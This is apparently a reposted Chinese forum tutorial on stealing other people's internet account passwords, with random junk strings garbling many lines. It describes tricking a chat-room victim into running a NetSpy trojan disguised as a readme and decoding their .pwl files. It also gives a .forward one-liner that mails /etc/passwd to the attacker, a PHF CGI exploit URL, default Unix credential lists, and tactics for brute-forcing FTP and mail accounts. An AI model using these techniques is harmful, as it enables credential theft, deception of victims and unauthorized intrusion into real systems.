如何得到别人的上网帐号和密码,我在这里介绍几种弱智方法。# H6 j- {8 a9 h* i# n
方案一:利用特洛伊木马得到帐号。必备工具:NTESPY、PWLVIEW。0 h8 x0 }2 M, W ^0 ~! W0 E- U, |9 o# s
优点:只要对方运行了程序就有80%的成功率,而且不需要任何网络入侵知识,只要能熟悉的操作上面两个软件即可。NETSPY是全中文软件,一看就会。而PWLVIEW又是弱智操作只要在DOS下输入PWLVIEW然后按回车即可。成功率高,操作简单而且用不了多长时间是它最大的优点,只是......
- d, R" q0 {6 [$ j& C7 G缺点:只有一个,那就是如何让对方乖乖的运行你的程序。- B- H, w& }9 f, G- x
提示:先问清你的目标和你是不是在一个城市。; M6 m" J; y) h- C
实战演戏:一天,我在X海聊天室里寻找目标,遇见了同在北京的色鹅丢丢。我上前打招呼:丢丢好呀。丢丢说:你好呀。我又说:XXXXXXX(客套话,先和他拉关系)对了,我拿到了一个新程序,要不要看看?丢丢说:好呀,寄给我吧。8 y- X: v/ _ q. |9 ?( t' C- W* E- \( R
哈哈,鱼上钩了!先把诱饵程序改个名,如改成readme之类的东东,然后和一些不相干的东西发过去,然后你让他先运行README。在这插一句,有一位大侠使用此法时,竟然把控制端程序和NETSPY的说明文件一起发了过去,真搞不懂他怎么想的。我对他说,你先运行README,是中文说明。丢丢说:好...咦,怎么没反映呀?(YEAH!)我又说:那你直接运行软件吧。丢丢说:好吧...不错...我说:明天见...开始干活,连上他的机子后,现在C盘里找到了WIN95的目录WINDOWS。也有可能是WIN95或WIN98,进入后查找*.pwl,然后把所有后缀名为PWL的文件都抓过来,放在你的工具PWLVIEW的子目录里。在DOS窗口下输入PWLVIEW然后敲回车,丢丢的上网帐号和密码就都显示出来了。而且以后如果他上网,NETSPY就会通知你,他就再也逃不出你的手掌心了。就算是他换了密码,你也能在2分钟内再把他搞定。* J0 V0 g9 A$ ~' s
忠告:你用他的帐号上网后第一件事就是先去查看他的上网时间。分析一下他一般几点上网以避免撞车。
' E+ a c M% T1 E. X/ K方案二:利用ISP的疏忽做文章举。例用工具:EMAILCRK或网络刺客8 [. b0 L! q3 a$ n! k
优点:没什么优点$ M& ^% F$ P! O! y4 B; t
缺点:要具体情况具体对待,太麻烦2 A. i% _% T7 f/ l0 z3 `$ t
提示:平时多多留神。
# I) ^3 A0 O' \譬如,某个ISP给你开好了帐号,然后又画蛇添足的给你一个邮箱,地址是:你的帐号@xxx.net
5 R% P- H7 F% l+ D3 W密码和你的上网密码一样。也就是说,只要你能敲开邮箱的密码就一切OK了。
@- D8 K I n* Z, \% ~运行EMAILCRK或网络刺客,套上字典后就等着。一般没有XX个小时搞不定,不成功的可能性很大,而且破解时还必须要上网。你的机子要是快可以开上三四个窗口,套上不同的字典一起破* s5 n' S+ ]8 n4 m
方案三:侵入邮局主机然后把PASS档抓回来,然后用JOHN或JACK套上字典开始破。
0 M' K7 T6 V9 c6 K' D% m- X优点:一次可以破出好多帐号,而且如果运气好还能拿到ROOT,这个主机就要归你控制了。而且破解时不用上网,可以好几台机子一起破。
+ I9 o/ c/ ~0 G- T; b! f; [2 ]缺点:对于初学者有一定困难,尤其是只想拿一个上网帐号这样做恐怕会得不偿失。而且被发现的可能性很大,情节严重且性质恶劣,一定要慎重对待。7 Q- \) d. P, S/ K
由于介绍此类的教学文章比较多,我就不班门弄斧了。 : i6 \; {9 `% H% w: s3 |& d
! o8 B. W, [ B8 v8 n哈哈,我来说说最简单的入侵方法。其实入侵大体的原理相同,主要是利用系统的漏洞(BUG)来做文章。
% X" v' Z; g5 o* j2 Z/ Z# u o; |只不过有的网站漏洞难找有的好找而已。一个好的黑客,就是要能很快的发现漏洞并加以利用。下面我给大家举一个小栗子。2 @- O9 Y! @5 u3 z" \6 T
有一天,我去XX热线申请主页,发现那里采用的是机器自动回信,信的大概格式如下:& j: i3 o# Y7 e7 g. L. H& A
P Z1 q. w4 g6 V% y------------------------------; ` a% Y0 Z- ~5 c) ~
; Y' ^+ Y) a& @4 }/ v! V$ b6 p" b
XXX,你好(XX是你在表格上填的名字)- N, Y3 h; A" v; j
你在XX热线的主页空间已开通
8 E2 E+ P# L* a3 d. L帐户名:XXX 密码:11
: \6 M6 p& i. ]$ X4 W9 N-----------XX热线2 x5 G7 n; t: b/ f; B7 [
电话:XXXX-XXXXXXXX% A" J4 b) _( j7 K7 p
------------------------------
* r$ l) `6 E+ t* h3 v3 n; \! ^& v1 Y8 ]( `; S
好了,由于是机器回信,所以那里所有人的初始密码都是11,而且该热线要更改密码要TELNET到邮局主机去改,有许多网友并没有接触过如何T主机,所以他们使用的还是初始密码11。0 i t2 Y. ]2 ~
开始干活了,打开FTP软件,输入XX热线的IP,密码11,然后挨个输入帐户名。帐户名可去XX热线的主页空间列表里查看,先试试AAAA,。。。没成功,再换一个,AABB。。。还是不行。哈哈,这个用户名短,没准能行。输入AA。。。进去了。寄下用户名然后继续试,ABC。。。又成功了,看来没改密码的人很多呀。试几个就行了,现在,你已经拥有这些帐户的控制权了。
" ?; P# J6 F; ~; a# n' L5 S上面的这个栗子很简单,一般象这么大的漏很难找。要侵入一个稍微象点话的站台就要耗费你大量的时间和金钱,而且还未必能成功。即使成功了,你不改它实在无趣,改了恐怕会步马X的后尘。此人侵入贵阳的主机并把界面换成了一张淫秽图片。害的自己吃饭不用花钱了。所以我在这里劝大家一句,把这方面的精力放到全心全意为人民服务上去。实在不行就去聊天室,看谁不听话就炸他,同样很过瘾的!
2 R6 U" o3 b1 r! P! c" T& Q8 ^
7 x( P& c$ Q8 l( u0 |- \9 X5 Q% m) Y2 Y
如何获得第一个帐号
2 n& [1 U, d, d6 L) R0 m$ K4 U8 P! L& X9 B) ]6 z
我们这种水平不高的黑客入侵都是先得到系统的一个有效帐号,进入后再利用系统BUG得到ROOT权限或想办法得到SHADOW再解密.无论是利用系统漏洞还是得到SHADOW都是有一定规律可寻的,通常你到一些黑客站点找到对应系统相应版本的EXPLOIT编译后执行就行了.我感觉最困难的是获得第一个有效的帐号,有时侯费尽力气也得不到,后来总算是积累了一些经验,想写出来和大家交流一下,希望能抛砖引玉,请高手们把更好的方法告诉我.
/ Z0 }2 U! I' O
. I0 q' Q4 N+ v) l6 i5 m! d确定了目标以后,我通常是先用匿名FTP去看一下,许多网站都开匿名FTP,帐号用ANONYMOUS或是FTP,密码用一个EMAIL帐号(当然是假的),进入后到/etc目录下把PASSWD拿回来,一般情况下都是一份很不全的名单,只有几个系统帐号,那就算白来了:-}但有的时候会有比较傻的管理员把一些普通帐号放进去,这就是很重要的信息,虽然只有帐号没有密码,但毕竟迈出了第一步.如果FTP主目录是drwxr-xr-x,做一个.foward文件传上去,在UNIX下的命令应该是echo"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr" > .forward然后给匿名用户写一封信,它会把PASSWD发给你。
2 V# X+ x0 J2 S) R$ X: o5 ~! a1 P# X5 n4 g
如果目标没有匿名FTP,就通过WWW访问它的主页,看看上面有什么信息,例如通过一些联系人的EMAIL你就可以发现一些帐号,有的网页上甚至列出了EMAIL通讯录,这对黑客来讲就是无价之宝.把这些帐号记下来,非常有用.% \ ?8 y3 H" Y( s% F
% I& j1 o1 b/ _& H1 Y) c8 X( r以上几个方法都不行的话,那就试试PHF查询.在浏览器的地址栏输入http://攻击目标/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd如果成功的话会显示出PASSWD来,但是成功率极低:-< & ~4 p: u1 z2 x
! R7 I7 X4 ]! Q, j8 L2 T1 s& w8 r还可以利用目标的FINGER功能来积累帐号,如利用HAKTEK(一种扫描器)来监视目标,一旦有人登陆该主机就会报告给你.但这种方法的缺点就是浪费时间,如果你是自己花钱上网的话可就要出血了!
; n+ B# _+ v3 }1 _ E1 ]% z; M2 w/ F
很有可能以上的方法都不行,那只好使出我的看家本事了-------猜!!!有一些系统默认的帐号,例如: p& ?' n5 [) H" O. x
1 Q# B1 j! n, N W4 W" [* F帐号 密码3 r0 `2 t! \4 O$ {( T+ U) {- [
----------- ----------------
5 r8 r! K3 D/ c# U" Y& | Kroot root o" u2 `' E; ]3 M
sys sys/system/bin$ u" o% D9 {8 @" [7 Y
bin sys/bin$ L. o% `& n0 p/ Z0 E p
mountfsys mountfsys: m% B! y- }+ G- q
adm adm+ a9 G6 ?# A& {; K: U( k
uucp uucp. k7 a7 s# c9 r" o" l; q4 \+ F
nuucp anon& z# y1 I T. v) h" ]* u1 N
anon anon M& a2 z: i7 s1 p0 @. @ {% r
user user
2 V/ J8 i/ }* B7 ?0 fgames games/ w& M. J% z; D G' R: [# I& y7 k
install install
* c6 p6 c. g {1 [& Lreboot 给 "command login" 用的2 Z; j& T m+ I- a* }
demo demo
7 u" Z1 ]* M0 A2 i7 Mumountfsys umountfsys
N# j y. b1 a5 J: x/ h2 k4 xsync sync. q. G0 g `6 e8 Q
admin admin$ Z* r& f& q9 x9 G Z& Y. h
guest guest; i0 Z& J. D* N3 q. |
daemon daemon
7 g. T* J6 G9 m' V, O________________________________________________________________$ c; v0 i: r3 W* s0 ^2 x# C! d
7 j1 {4 H; o5 s1 s有些管理员忘记把他们改掉,那你就发财了!
* { G4 F0 e4 f! a1 I( r) ?
% i# e* o6 @8 [' L7 j$ K另外还有一些习惯性帐号如:test,www,html,web,oracle,setup,sybase,john,tom等也都应该试一试.8 b4 ~3 t2 S/ f, z& E6 ~8 M
0 f, h. i( s; H1 v" Z: c只有帐号还不能进入系统,但有了帐号搞密码就容易一些了,主要办法还是猜.如果是通过PASSWD知道帐号的那你应该会发现该用户的许多信息,例如:
' j( G8 q1 D" I
/ \; A' H& I9 W6 g1 v9 k.........9 ^' B8 O; g5 K2 c5 F! g% V& P
" N, _6 o: t0 M4 r/ sxlguo:x:263:50:Guo xiaolin:/usr/xlguo:/bin/sh
4 d! q& T X) |+ D( g& I" ^0 w- e. X/ E4 u# N
qingyuan:x:275:50::/usr/qingyuan:/bin/sh8 k- `% m& y" a) \( H* A2 w
; F8 E# b$ D; q9 _( [hjhuang:x:278:50:Huang Haijun:/usr/hjhuang:/bin/sh
$ H' @: o; H. S" t; X+ L1 c b: Y$ g9 c
smlian:x:282:50:Mr. Lan Shumin:/usr/smlian:/bin/sh
, O6 N$ z6 [1 N7 o; q- n' {- ~7 L! g4 E) D1 B' E+ |
kyc:x:293:50:Department of Science & Technology:/usr/kyc:/bin/sh3 b g" }6 \( r' t7 C: c
* t; i9 q; r4 L
brlu:x:300:50:Lu Baoren:/usr/brlu:/bin/sh+ `% j7 H' |, N5 \3 p% Y+ {8 t" Z
+ Z0 l0 ?! ~# [* ?* h
tide:x:301:50:Wang XinYi:/usr/tide:/bin/sh
+ x( a5 @1 Y# I0 I, t9 {" F. Y( x( f3 H3 u0 U
............
/ g3 ^: g6 I: |3 s+ e
* \9 f/ N# [0 G1 j这是一部分PASSWD,从这儿我们可以得到七个帐号,注意每一行的第五项,那是该用户的真实姓名,对!就用它来做密码试.成功率还是比较高的.; O9 S. D: }' S1 N5 V
+ x: a/ Q) Q- A如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜">如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜.
: J! |* e# ?$ B6 Y( g8 }1 g: c6 I/ ], W( C3 G* B7 e' _
当然最可能的密码还是帐号本身和一些帐号的变形,如帐号是john,密码可能是nhoj,john123,john888等.或是一些简单数字.总之是要费一番工夫来猜的.1 p- M7 J' x* y' P6 v) }
/ r/ L Y4 l8 {8 u
如果还猜不出密码,只好用LETMEIN之类的东西来猜,字典一定要好.否则,你的电话费就要.....而且这种方法比较危险,还是不用为好.
4 [. ?& ~- p2 ?0 _. q0 c) ?& s9 m( }
最后实在不行还有一种比较卑劣的手段,就是给该网站的网管写封信,想办法骗他执行特洛伊木马,然后再.......算了,不说了.; r$ X3 V: A) @& n% _+ V, l: k t2 }
* V5 t- Z$ o- j B) I& d; q你可能发现以上这些方法都不能百分之百的成功,或者说成功率是比较低的,因为我也不知道更好的方法.但我感到一定有一种更好的方法,希望有高手见到此文能告诉我.; r5 X# {1 h1 m% O
8 T# U* e0 c9 i- Z! V6 t
|